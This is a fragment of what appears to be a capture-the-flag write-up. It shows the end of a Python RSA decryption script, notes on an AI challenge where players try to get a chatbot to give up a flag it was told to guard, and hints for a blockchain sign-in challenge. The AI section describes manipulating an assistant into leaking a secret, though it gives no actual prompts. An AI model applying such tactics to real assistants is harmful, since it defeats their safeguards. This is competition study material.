phi_n = (p - 1) * (q - 1)
e = 65537  # public exponent, usually this value

# Compute the private key d
d = inverse(e, phi_n)

# Decrypt
m = pow(c, d, n)

# Convert the decrypted long integer to bytes
flag = long_to_bytes(m)

print("解密后的 flag:", flag.decode())

AI

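Little Assistant (小助手)

Here is a cute little assistant. 生蚝 gave it a mysterious little flag. If you have the heart to snatch the flag away, it will be punished. Please don't take the flag, okay? /(ㄒoㄒ)/~~

This one just comes down to luck

Usually the first nc connection is more likely to succeed (maybe because it has just been initialized)

At one point this also popped up; the result is probably being checked and filtered

Blockchain

just Signin

Made in a hurry; the unintended solution will be very easy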

Sepolia Address: 0x3948DF4C50B1671eaa6b22876Ea746899a6916C1

What is a Blockchain Explorer? Focus on input data

Sepolia Transaction Hash (Txhash) Details | Etherscan

bytecode
